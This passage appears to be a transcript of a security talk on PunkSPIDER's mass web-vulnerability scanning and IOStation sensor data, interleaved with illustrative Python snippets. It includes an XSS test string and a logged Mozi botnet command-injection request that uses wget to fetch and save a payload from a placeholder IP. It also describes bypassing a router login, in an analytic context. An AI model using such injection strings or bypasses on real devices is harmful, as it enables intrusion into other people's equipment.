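from html import escape


def render_search_banner(query: str) -> str:
    """Build an HTML fragment that echoes the user's query safely."""
    # escape() turns <, >, & and quotes into entities, so the browser
    # shows the text instead of running it as markup or script.
    return f"<p>Results for: {escape(query, quote=True)}</p>"


if __name__ == "__main__":
    print(render_search_banner("<script>alert('punkspider')</script>"))
```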

30:39 - - Yeah. - Cool. So all right, let’s head back to the slides.

30:44 - All right. So, you know, how is this being used, Alex? - Wonderful question, Jason.

30:50 - So I feel like we’re news anchors or something.

30:53 - (laughs) But anyway, so you’re probably wondering, of course, so we’re releasing a fuck ton of vulnerabilities, right? And we’re just giving them out for free.

31:03 - So how do you access them, right? A few ways you can use this.

31:07 - One is the browser extension, which we’ve shown you.

31:10 - Of course, very, very useful. Please download that and use it if you like it.

31:16 - There’s a free and open REST API. You can search by vulnerability, domain name, wild cards are all allowed.

31:22 - You have even character wild cards and things like that.

31:25 - So full wild card search, there’s no limitation there.
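To illustrate what a search by domain and vulnerability with wildcards looks like, here is a small local sketch. It does not call the PunkSPIDER API, whose endpoints and parameters are not given in the talk. The records, field names, and the `search` function are all made up for illustration, and matching is done with shell-style patterns (`*` for any run of characters, `?` for a single character).

```python
from fnmatch import fnmatchcase

# Hypothetical result records; the real data format is not shown in the talk.
RECORDS = [
    {"domain": "shop.example.com", "vuln": "xss"},
    {"domain": "blog.example.org", "vuln": "sqli"},
    {"domain": "example.net", "vuln": "traversal"},
]


def search(records, domain_pattern="*", vuln_pattern="*"):
    """Return records whose domain and vulnerability match both patterns."""
    return [
        r for r in records
        if fnmatchcase(r["domain"].lower(), domain_pattern.lower())
        and fnmatchcase(r["vuln"].lower(), vuln_pattern.lower())
    ]


if __name__ == "__main__":
    print(search(RECORDS, "*.example.com"))        # full wildcard on the domain
    print(search(RECORDS, vuln_pattern="?ss"))     # single-character wildcard
```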

31:30 - There’s a CLI tool that you can use as well, built by the wonderful Mr. Hopper over here.

31:36 - So you can get stuff like that as well. Soon to come: a search engine interface, already in alpha.

31:43 - Jason already showed you some of that. It’s search by vulnerability, domain name, wildcard search, all in play.

31:49 - We don’t limit any of that kind of stuff. Recon-ng module.

31:52 - Tim Tomes, you know him. Wonderful man, wonderful software.

31:56 - H8mail module, if you use that. Metasploit module, just because everything needs a Metasploit module, and really anything that you all feel that you would like to see with this data, just shoot us ideas.

32:10 - We can build it or you can submit something, it’s an open source, you know, thing, whatever, but let us know how we can support you.

32:20 - Yeah. - Help us help you. - Let us know how can we help you, basically, and we will help you out, so. - Yeah.

32:28 - - Moving on from there. How do we do this, right? We get this question a good amount.

32:34 - How do you scan that many websites? You had to create your own scanner.

32:37 - You had your own fucking internet service provider, et cetera, et cetera.

32:41 - The real answer is it was just a ton of work and a lot of benchmarking, right? The original PunkSPIDER was built on old technology.

32:48 - So there’s a bunch of benchmarking I had to do in terms of what’s important.

32:52 - What’s important here? Computing power, memory, bandwidth, IO, all kinds of different things.

32:57 - So there was all kinds of tests that we needed to run to make sure that everything was running as smoothly and as quickly as possible.

33:04 - We had some creative engineering in there, right? So we’ve repurposed a lot of technology that’s really built for, you know, search engine technology, data analytics technology, all of that stuff is being used in the backend of PunkSPIDER.

33:19 - It’s just we’re completely repurposing it for the purposes of offensive security.

33:23 - Last thing that we did is we embraced the cloud, right? Ride the snake, meaning we’re addicted.

33:28 - We’re all of a sudden addicted to heroin. I mean, AWS.

33:32 - - Same thing. - What’s that? - Same thing.

33:35 - - Same thing, yeah. Very, very similar things to be addicted to.

33:39 - Both can cost you thousands of dollars a month.

33:43 - AWS is probably more dangerous, but we really embraced it and we just realized like, you know, the world is kind of moving in that direction, and so we may as well take advantage of that, right? So next slide, sir.

33:59 - All right, all I wanna show you is that we do have metrics and monitoring on the backend of the system.

34:03 - Like I said, it is a very well-funded, well-engineered system at this point.

34:10 - All I’m showing you here at the top left, you’ll see the word Ferret.

34:13 - Ferret is our custom built scanner, and all I really wanted to show you here is that there’s a bunch of different scan nodes, and each of those scan nodes is handling thousands of different websites.

34:25 - So this would get reshuffled and things like that, as more data either comes in or this cluster is scaled more, which, to me, it looks like it needs to be scaled a little bit more, but it’s a good view into the fact that we are doing truly, truly mass distributed scanning.
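One simple way to picture websites being spread over scan nodes, and reshuffled when the cluster is scaled, is hash-based assignment. This is only a sketch under that assumption; the talk does not say how Ferret actually assigns work, and `node_for` and `assign` are hypothetical names.

```python
import hashlib
from collections import defaultdict


def node_for(domain: str, node_count: int) -> int:
    """Map a domain to a node index using a stable hash."""
    digest = hashlib.sha256(domain.encode("utf-8")).digest()
    return int.from_bytes(digest[:8], "big") % node_count


def assign(domains, node_count):
    """Group domains by the node that would scan them."""
    shards = defaultdict(list)
    for domain in domains:
        shards[node_for(domain, node_count)].append(domain)
    return dict(shards)


if __name__ == "__main__":
    sites = [f"site{i}.example" for i in range(12)]
    print(assign(sites, 3))   # three scan nodes
    print(assign(sites, 4))   # scaling to four nodes reshuffles the assignment
```

With plain modulo hashing most domains move when the node count changes; schemes such as consistent hashing reduce that movement, at the cost of more bookkeeping.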

34:44 - So we can move onto the next. Yeah.

34:49 - So actually you could skip this slide. - Okay.

34:52 - - All right. Thank you, sir. So how does this work, right? I wanted to give you a basic architecture of PunkSPIDER.

34:58 - We have a Kafka Queue. Kafka is a simple queuing system.

35:01 - So something comes in and something comes out to a system that’s ingesting that, right? The reason that we need a queuing system in order to do this is that we are submitting so many URLs that we need a piece of technology that is distributed and allows us to handle the level of data that we’re talking about because we’re submitting something like tens of billions of domains, which means hundreds of billions, if not trillions of actual webpages.

35:29 - So queuing technology is really important here, and it’s used very much throughout PunkSPIDER.

35:34 - Next slide, please, sir. (laughs) - The ferrets.

35:37 - - Infinite Ferrets, right? So because that Kafka queue, again, distributed, just gives you a website.

35:44 - We need something to then scan that website.

35:46 - As I mentioned, that application is called Ferret, right? So that’s our web app fuzzer.

35:50 - It works really quickly, works in a distributed manner with kind of Kubernetes autoscaling.

35:57 - So we need a lot of Ferrets to really be able to scan all of these websites and get all of the data that we want, and then present that back to you, which is done in the next slide.

36:11 - And we see that we index these results into two different things.

36:14 - One is RDS for stats, and the other thing is CloudSearch to obviously build the search engine frontend for everybody.

36:23 - So all of this is kind of a simplified view into the entire thing.

36:27 - This feeds back into the queuing system, actually.

36:31 - And yeah, this goes back into the queuing system and can even create more URLs for us to scan and things like that.

36:40 - So that’s basically how it works on the backend.

36:44 - What I really wanted to point out is that everything is fucking distributed.

36:47 - Everything is distributed. That’s why I have pictures of lots of ferrets, pictures of lots of Kafkas, pictures of lots of results, right? Everything is distributed, so we can scale; sky is the limit.
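The flow described above (a queue hands out websites, many scanner workers consume them, results go to a stats store and a search index, and newly found URLs go back into the queue) can be sketched in a single process. This is a toy model, not the real system: an in-memory `queue.Queue` stands in for Kafka, threads stand in for Ferret pods, two dicts stand in for RDS and CloudSearch, and `fake_scan` with its `LINKS` table is invented for illustration.

```python
import queue
import threading

# Hypothetical link graph: which sites a scan of each site "discovers".
LINKS = {
    "a.example": ["b.example", "c.example"],
    "b.example": ["c.example"],
    "c.example": [],
}


def fake_scan(site):
    """Stand-in for the fuzzer: returns (findings, newly discovered sites)."""
    findings = ["xss"] if site.startswith("b") else []
    return findings, LINKS.get(site, [])


def run_pipeline(seeds, worker_count=3):
    todo = queue.Queue()          # stand-in for the Kafka queue
    seen = set(seeds)             # avoids scanning the same site twice
    stats, search_index = {}, {}  # stand-ins for the two result stores
    lock = threading.Lock()

    def worker():
        while True:
            site = todo.get()
            if site is None:      # sentinel: no more work
                todo.task_done()
                return
            findings, discovered = fake_scan(site)
            with lock:
                stats[site] = len(findings)
                search_index[site] = findings
                for new_site in discovered:
                    if new_site not in seen:
                        seen.add(new_site)
                        todo.put(new_site)   # feed back into the queue
            todo.task_done()

    for seed in seeds:
        todo.put(seed)
    threads = [threading.Thread(target=worker) for _ in range(worker_count)]
    for t in threads:
        t.start()
    todo.join()                   # wait until every queued site is scanned
    for _ in threads:
        todo.put(None)
    for t in threads:
        t.join()
    return stats, search_index


if __name__ == "__main__":
    print(run_pipeline(["a.example"]))
```

New sites are queued before the parent task is marked done, so `todo.join()` cannot return while discovered work is still pending.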

37:00 - - Cool. - Let me grab more data from IOStation, which Jason’s gonna tell you about.

37:05 - - Yeah. So, you know, running a datacenter has been a lot of work.

37:09 - It’s interesting. It’s one of those things where you have to decide where you want to put your time and effort.

37:15 - I’ve built this system on Postgres, which is awesome.

37:18 - If there’s a really specific reason, I’ll use something else, but I use Postgres a lot.

37:22 - RabbitMQ, I used for years. However, I had an issue where it would just like disconnect consumers all the time.

37:30 - So all of the sensors would be passing messages to it and then the consumers would get disconnected.

37:34 - And then the queues would get so big that they would stop delivering messages, which makes no sense.

37:38 - And then even worse, they’d continue to get big and eventually explode the nodes.

37:42 - So I eventually replaced it with Kafka, which, you know, isn’t perfect, but I’ve definitely had much better results overall.

37:49 - And the rest of it is kind of Bash and Python, because I’ve been developing this myself to this point, and so kind of simplicity is key.

37:55 - You know, removing as much complexity as you can in a lot of ways.

38:00 - It will make your life a little easier, when it’s just, you know, a one-person operation, that is.

38:05 - So Alex showed his UI. So I thought I’d toss mine up here too.

38:07 - It’s pretty simple. You know, you type in an IP address, search it.

38:11 - It shows on the map where it’s resolving. We’ve got GeoIP and Whois data. And then for the port scan data, it shows each port in a different card.

38:21 - And I think I mentioned before, you know, it’s scanning over 25 ports, there’s a lot of custom extractions that are going on in this.

38:27 - And then, of course, the normal stuff, like, you know, service identification and banners, and stuff like that.

38:32 - And it’s too much to show in one screenshot, but below is where all the listening service data is.

38:37 - And then there’s SSL certs and things like that.

38:39 - This website has never been public nor probably will it ever be.

38:42 - But you know, can’t let someone show their old UI alone.

38:45 - It’s not appropriate. So just a really quick little case study, I guess, of something that has been coming across IOStation.

38:53 - So there’s this thing called the Mozi botnet.

38:55 - Back in 2019, I started observing it. It’s known to other people, it’s a really big botnet right now.

39:02 - And basically, it’s trying to do command injection on servers.

39:04 - So these are the two URLs that I see most of the time, and you can see one of them is next_file=netgear.cfg.

39:10 - And then it wget-pulls this thing from an IP and port, Mozi.m is the file name, and then it runs it.

39:16 - And then similarly, the other one does the same thing, but with Mozi.a, and it executes it slightly differently.

39:21 - But basically this looks like it’s trying to do this on Netgear equipment at a minimum.
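A sketch of how a sensor log line like the ones described could be mined for the malware download location. Only `next_file=netgear.cfg`, the `wget` from an IP and port, and the `Mozi.m` file name come from the talk; the rest of the sample request (`/setup.cgi`, `todo`, `cmd`, the `192.0.2.10:8080` address from the documentation range) is an assumed shape for illustration, and `extract_payload` is a hypothetical helper.

```python
import re
from urllib.parse import unquote_plus

# Assumed example of a logged request target; not a real observation.
SAMPLE = (
    "/setup.cgi?next_file=netgear.cfg&todo=syscmd"
    "&cmd=wget+http://192.0.2.10:8080/Mozi.m+-O+/tmp/netgear"
)

# Matches http(s)://host:port/file inside the decoded request.
PAYLOAD_URL = re.compile(
    r"https?://(?P<host>[\w.\-]+):(?P<port>\d+)/(?P<file>[\w.\-]+)"
)


def extract_payload(request_target: str):
    """Return host, port and file name of the download URL, or None."""
    decoded = unquote_plus(request_target)   # "+" and %xx back to plain text
    match = PAYLOAD_URL.search(decoded)
    if match is None:
        return None
    return {
        "host": match["host"],
        "port": int(match["port"]),
        "file": match["file"],
    }


if __name__ == "__main__":
    print(extract_payload(SAMPLE))
```

Collecting the `host` values across many requests, and comparing them with the source addresses of those requests, is the kind of split between attacking and hosting machines that the talk goes on to describe.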

39:25 - And we know from PunkSPIDER that there are tons of websites that are vulnerable to injection like this, so.

39:32 - So I started digging a little bit deeper and I used this data to identify where the attacks were coming from and where the malware was being hosted.

39:41 - And interestingly, they were always different IP addresses: whatever computer was saying, go download and run this malware, was never the same IP address where it was being hosted.

39:52 - And they were mainly hosted in China, like predominantly, you know, definitely some in India.

39:56 - And of course it’s a botnet, so it’s spread across the world.

39:59 - But there was a huge amount of it coming from China, which was interesting because then when I looked at which sensors the botnet was hitting mostly, it was really heavily hitting India, Japan, Australia, and then to a slightly lesser degree, Canada and Germany, but there were no hits in China, which was kind of funny.

40:18 - And I’m not trying to suggest that this is some sort of like, you know, clever state sponsored piece of malware or anything like that.

40:25 - I just thought it was funny that none of my Chinese servers actually saw any of this and it almost looks like kind of a geopolitical map, you know, a little bit.

40:32 - So yeah, China’s suspiciously missing there.

40:36 - You know, I did dig in to look at what devices were actually part of this botnet, and it definitely looked like a lot of D-Link, Netgear, and Huawei gear.

40:43 - I saw IP cameras, DVRs. There were some GPON devices, which was a little interesting.

40:48 - I didn’t really see anything that indicated it was part of any sort of like corporate structure or anything.

40:53 - But the software being used are a lot of web servers, but they’re all like kind of small lightweight ones that you see being used in sort of embedded devices and things like that, like home routers.

41:02 - And I did notice that the lighttpd version that I saw a lot of, actually 1.4.39, had just a ton of CVEs and many of them were just like blanket, you know, remote code execution vulnerabilities and stuff, which was kind of cool.

41:17 - So I did kind of poke around at a few of these things, like what they were showing, and I found this kind of cool example.

41:21 - This was just somebody part of the botnet. It has an interface that looks a lot like D-Link.

41:27 - I didn’t try to login or anything like that.

41:28 - The links on the top made you login, but I did dig around the JavaScript ‘cause it really wasn’t that much actually.

41:34 - And I saw that it was crafting these links, so I went to a few of them directly like a sys status.asp, for example.

41:41 - And, you know, I guess it doesn’t always want you to login.

41:44 - So if you go to them directly, the login page actually is bypassed.

41:48 - And I was able to see all the internal DHCP tables, and all the routing information and all that stuff.

41:53 - And, you know, while this isn’t some, you know, egregious vulnerability necessarily in its own right.

41:58 - It’s just kind of illustrating like, this is the kind of nonsense that is still all over the internet.

42:02 - Like I know security has been a hot topic. It’s getting better, I think, I think, anyway.

42:08 - But there’s still craziness like this, where this person’s router just like lets you login, and yeah, that’s kind of crazy to me.

42:15 - So, you know, we’re kind of running out of time here, but I’m sure the burning question in everyone’s mind is where’s this all going? So where’s it going, Alex? - Right.

42:24 - So I just want to recap for everybody, right? So a couple of quick things.

42:28 - Created a hugely scalable system for fuzzing a fuckton of URLs.

42:31 - We’ve found a bunch of vulnerabilities in major websites.

42:34 - We’ve even found zero days in a popular forum technology, right? So obviously, the probably most important part of that is that we’re releasing that out to you all, the public.

42:47 - And we want to keep these results updated while still continuing to go extremely broad.

42:52 - Our target is still the entire internet. We’re not gonna let up on that target.

42:57 - We’re gonna continue engineering until we’ve reached that target and we can keep the records reasonably updated to a certain degree, right? So how can you kind of help us, right? So I mentioned throwing us ideas, obviously, is really helpful, but download that extension.

43:13 - Use that CLI tool, start calling out websites, all of these things are really helpful and not only help PunkSPIDER, but are part of the mission of PunkSPIDER, really.

43:26 - We built this for you all. So feel free to use it, basically, is all.

43:34 - - As far as IOStation is concerned, you know, I think that continuing to transform my mindset from pure cybersecurity to evaluating risk and risk scoring is really interesting.

43:46 - So I wanna continue kind of going down that path.

43:48 - That’s not to say that there won’t still be the broad internet collection tools that I’ve been working with and know and love, but it’s just that some of the newer features that are coming out probably will be geared towards that.

43:59 - Especially when it comes to critical infrastructure and industrial control systems, which for anyone paying attention to the news lately, I’m sure knows has been a bit of a hot button topic when it comes to certain pipelines, which may not be named.

44:09 - (laughs) But I think that’s a really fascinating area, and especially one that’s, you know, obviously, increasing in importance.

44:18 - I know there’s a lot of utilities and things that have really ignored their cybersecurity posture, and they’re starting to get bit by it.

44:25 - And anyways, that’s something I think we need to look at.

44:28 - And the other one is a little bit more vague, but really trying to identify attacker infrastructure.

44:34 - Like are there things that we can be observing from the outside to identify what an attacker is using and how they’re organizing? But you know, maybe early on or at the onset or whatever, as early as possible obviously is better.

44:47 - You know, is there software that can be probed and identified running across the internet? Are there any sort of particular techniques or patterns or signatures or anything like that that we can extract? You know, this one is not as well thought out.

45:01 - Obviously, it’s just something that I think we’re pretty interested in tracking down long-term, but I think that about wraps it up for us.

45:08 - So yeah, if you want to shoot us an email or whatever, feel free.

45:11 - You can, you know, visit our office, but Alex and I won’t be there, so.

45:15 - (laughs) - Yeah. Thanks everybody for coming in, and listening to our talk.

45:22 - We really appreciate it. And, you know, thank you all for taking the time to listen to us ramble on about the system, and I hope you really enjoyed it.

45:31 - - Yeah, thanks everyone. Take it easy. Bye bye.

45:34 - - Peace everybody. Later.